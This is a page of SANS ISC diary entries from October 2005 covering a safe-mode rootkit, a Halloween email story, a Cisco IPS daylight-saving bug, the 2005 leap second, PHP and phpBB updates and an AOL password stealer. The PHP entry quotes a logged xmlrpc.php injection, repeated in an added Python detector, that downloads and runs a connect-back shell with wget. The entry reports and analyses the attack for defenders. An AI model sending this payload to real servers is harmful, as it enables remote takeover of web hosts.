SANS ISC: InfoSec Handlers Diary Blog
Safemode rootkit & DRM

Published: 2005-10-31
Last Updated: 2005-11-01 12:38:49 UTC
by Patrick Nolan (Version: 1)
0 comment(s)
FWIW, there is a great analysis and commentary on a rootkit made to run in safe mode at Mark's Sysinternals Blog today. Thanks very much for the great rootkit detection work and writing, Mark!

F-Secure is also covering this in their blog.

Email From Beyond - Tell us your own Halloween stories

Published: 2005-10-31
Last Updated: 2005-10-31 19:58:01 UTC
by Tom Liston (Version: 1)
0 comment(s)
I'll start the Halloween ball rolling with a story of my own...  Send along your own tale of Internet strangeness, and around Midnight (GMT), I'll post some of the best...

I had known him for about 10 years when he died, too young, too soon.  He was the President of our local School Board, I was the Vice President.  We worked closely together on all of the topics and issues that face a School Board over the years.  Even through the times when the cancer made it difficult for him to go on.  He was that kind of man.

His name was John, and he was more than just my colleague... he was my friend.

He was also what I would call a computer nerd wannabe.  He loved genealogy and created incredibly detailed databases of his own designing.  He was a sucker for the latest and greatest technology gizmos, and always had newer and cooler toys than me.  But when things got beyond the world of his pre-packaged software, he was out of his depth.  That's when I'd get a call.

I pulled more than a few viruses off of his machine, always leaving him with a gentle reminder about safe computer practices.  But I could never get frustrated with him.  The differences in our ages placed him squarely in the generation before me, and getting angry at him would be like getting angry at my dad... something that I just could never do.

The day that he died, I was both honored and terrified when his wife and daughter asked me to speak at his funeral.  What would I say?  How could I possibly sum up a life?

The funeral was to be in three days, and for two of those days I spent my time gathering facts about his life: his years of service at his job, his family history, his years on the School Board.  On the night before the funeral, I sat down at my laptop and stared at a blank Word document, trying to decide where to begin.

I wrote.  I wrote for about two hours, putting down a listing of accomplishments, accolades, and achievements.  With each new item that I listed, a weight seemed to press down on me, more and more.  It just wasn't right.

Then, as I sat there looking at what I had written, the sound of a chime indicated that I had received a new email message.  I switched over to my email program and was incredibly startled to see that I had received an email message from, of all people, John.

The subject line read: "Thank you"

I flipped back over to Word, and opened a new document.  In about twenty minutes, I'd written a new eulogy with a very simple subject: "Thank you."  Thank you for all that you were.  Thank you for the difference you made.  Thank you for being you.

Although I never actually opened the email, I didn't need to look into the situation too closely to know what had happened.  One of the subject lines used by Netsky when it forged virus-laden email messages was "Thank you."

I still have that message, unopened, at the bottom of my in-box.

DST Cisco Surprise

Published: 2005-10-31
Last Updated: 2005-10-31 18:06:29 UTC
by Tom Liston (Version: 3)
0 comment(s)
Doh!  It seems that certain Cisco IPS systems can spit up a core file and go all brain-dead within 24 hours after a transition to or from daylight saving time.  You'll need a CCO password to view the Cisco bulletin found here.

Update: If you don't have a CCO account, you can still see the bulletin here. (Thanks, Tim!)

Clarification: The above probably implies that the IPS is completely dead.  In reality, monitoring and alarming remain functional.  The command-line interface (CLI) is what is curled up in the corner with its paws pointing skyward.

Leap second: when time stands still

Published: 2005-10-31
Last Updated: 2005-10-31 16:39:57 UTC
by Dan Goldberg (Version: 2)
0 comment(s)
Just after we in the US changed our clocks back an hour from daylight saving time to standard time, I ran across an interesting tidbit regarding time. This may have impacts across many information systems.

UTC TIME STEP
on the 1st of January 2006

A positive leap second will be introduced at the end of December 2005.
The sequence of dates of the UTC second markers will be:

2005 December 31, 23h 59m 59s
2005 December 31, 23h 59m 60s
2006 January 1, 0h 0m 0s

see: http://hpiers.obspm.fr/iers/bul/bulc/bulletinc.dat

This is being done to keep time in sync with the slowing Earth's rotation and the standard time measures in use in atomic clocks. There have been several leap seconds introduced since 1972. My original source for this information is the November 2005 Scientific American article by Wendy Grossman. The impacts on information systems can come from GPS clocks not recognizing the leap second and sending out flawed or inaccurate data, which can affect many time-based functions, including security features. According to the article there is talk within the International Earth Rotation and Reference Systems Service (IERS) (a United Nations organization) of decoupling standard time measurement from the Earth's rotation and adhering strictly to atomic decay.

NTP systems appear to be able to handle leap seconds: http://www.eecis.udel.edu/~mills/leap.html

Scientific American article here.

Happy travels through time ...
Dan Goldberg
Dan at madjic dot net
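As an added illustration (not from Dan's diary), the following Python shows the parsing problem the bulletin's 23h 59m 60s marker creates: a strict timestamp parser rejects it outright, and a naive subtraction of POSIX values across the boundary comes out one second short. It assumes ISO-8601 input and knows only the 2005-12-31 leap second announced above.

```python
import re
from datetime import datetime, timezone

# Leap seconds this example knows about: only the one announced in the
# bulletin quoted above. A real system loads the full IERS/NTP table.
LEAP_SECOND_DATES = ["2005-12-31"]

_TS = re.compile(r"^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})Z$")


def naive_accepts(ts):
    """Strict parsing as most libraries do it; ':60' makes datetime raise."""
    try:
        datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        return True
    except ValueError:
        return False


def parse_leap_aware(ts):
    """Return (posix_seconds, is_leap). POSIX time has no slot for 23:59:60,
    so the leap second is folded onto 23:59:59 and flagged, the convention
    Unix kernels and NTP follow."""
    m = _TS.match(ts)
    if not m:
        raise ValueError("unrecognised timestamp: " + ts)
    y, mo, d, h, mi, s = (int(g) for g in m.groups())
    is_leap = s == 60
    if is_leap:
        day = "%04d-%02d-%02d" % (y, mo, d)
        if (h, mi) != (23, 59) or day not in LEAP_SECOND_DATES:
            raise ValueError("second=60 only valid at 23:59 on a leap-second day")
        s = 59
    dt = datetime(y, mo, d, h, mi, s, tzinfo=timezone.utc)
    return int(dt.timestamp()), is_leap


def continuous_seconds(ts):
    """Map a UTC timestamp onto a scale that counts the inserted seconds
    (TAI-like), so differences are true elapsed seconds across a boundary."""
    posix, is_leap = parse_leap_aware(ts)
    offset = 0
    for day in LEAP_SECOND_DATES:
        last = parse_leap_aware(day + "T23:59:59Z")[0]
        if posix > last or (posix == last and is_leap):
            offset += 1
    return posix + offset


def elapsed(start, end):
    """True elapsed seconds between two UTC timestamps; plain POSIX
    subtraction is short by one across the 2005-12-31 boundary."""
    return continuous_seconds(end) - continuous_seconds(start)
```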


PHP and phpBB releases

Published: 2005-10-31
Last Updated: 2005-10-31 16:19:11 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
We usually do not add news about software releases, but these two are very important ones.
The first is about the new release of phpBB. This bulletin board system is very common and was the target of some perl bots some time ago, due to a vulnerability in its code. So, it is very important to keep up-to-date with the vendor.
The second one is PHP itself. They just released a new version, 4.4.1, and I would suggest you keep up-to-date on this one too...

Today we received a post about some Apache log entries regarding attempts to exploit vulnerabilities in another PHP application, xmlrpc.php. The entry was this one:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml
Content-Length:269

<xmlversion="1.0"><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>

This looks like they were targeting a vulnerability in xmlrpc.php. According to their website, the new release fixes some security vulnerabilities: "Note: all users are encouraged to upgrade to release 1.2 or later, since known exploits exist for earlier versions. All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
----------------------------------------------
Pedro Bueno ( pbueno //%// isc. sans. org)
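An added detection example (not Pedro's code, nor the xmlrpc project's): it parses a captured POST like the one above, with RFC 5737 documentation addresses substituted for the redacted ones, and flags two properties of the body, a <name> element where XML-RPC only allows typed values, and text shaped to break out of a quoted string inside eval()'d PHP.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the log entry above; documentation
# addresses stand in for the redacted ones, the body is the one quoted.
SAMPLE_REQUEST = (
    "POST /wordpress/xmlrpc.php HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Type: text/xml\r\n\r\n"
    '<?xml version="1.0"?><methodCall><methodName>test.method</methodName>'
    "<params><param><value><name>',''));echo '_begin_';echo `cd /tmp;"
    "wget 192.0.2.44/cback;chmod +x cback;./cback 192.0.2.194 8080`;"
    "echo '_end_';exit;/*</name></value></param></params></methodCall>"
)

# The only element types XML-RPC allows directly inside <value>.
VALID_VALUE_TYPES = {"i4", "int", "boolean", "string", "double",
                     "dateTime.iso8601", "base64", "struct", "array", "nil"}

# Signatures of text meant to escape a quoted string inside eval()'d PHP,
# the pattern the request above follows.
INJECTION_MARKERS = [
    (re.compile(r"""['"][\s,)]*;"""), "closes a quoted string and starts a new statement"),
    (re.compile(r"`[^`]+`"), "backtick shell execution"),
    (re.compile(r"/\*\s*$"), "trailing /* to comment out the rest of the eval'd code"),
]


def analyse_xmlrpc_request(raw):
    """Parse one captured POST and report why its XML-RPC body looks hostile."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        head, _, body = raw.partition("\n\n")
    report = {"request": head.splitlines()[0], "method": None, "findings": []}
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        report["findings"].append("body is not well-formed XML: %s" % exc)
        return report
    report["method"] = root.findtext("methodName")
    for value in root.iter("value"):
        for child in value:
            if child.tag not in VALID_VALUE_TYPES:
                report["findings"].append("<value> holds non-XML-RPC element <%s>" % child.tag)
            text = child.text or ""
            for pattern, why in INJECTION_MARKERS:
                if pattern.search(text):
                    report["findings"].append("<%s> text: %s" % (child.tag, why))
    return report
```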

(Another) AOL Pwstealer

Published: 2005-10-31
Last Updated: 2005-10-31 14:37:37 UTC
by Pedro Bueno (Version: 1)
0 comment(s)

Just a quick note about (another) password stealer that we received today, focused on AOL. This one is not detected by any AV on VirusTotal yet, although after I sent it to my personal AV list, some already answered that it will be included in the next signature release.
This one had the name new_pict.exe, maybe trying to fool the person into clicking on an attachment file.

If you run this file you will get this screen asking for a screen name and password.

------------------------------------------------
Pedro Bueno ( pbueno //%// isc. sans. org)
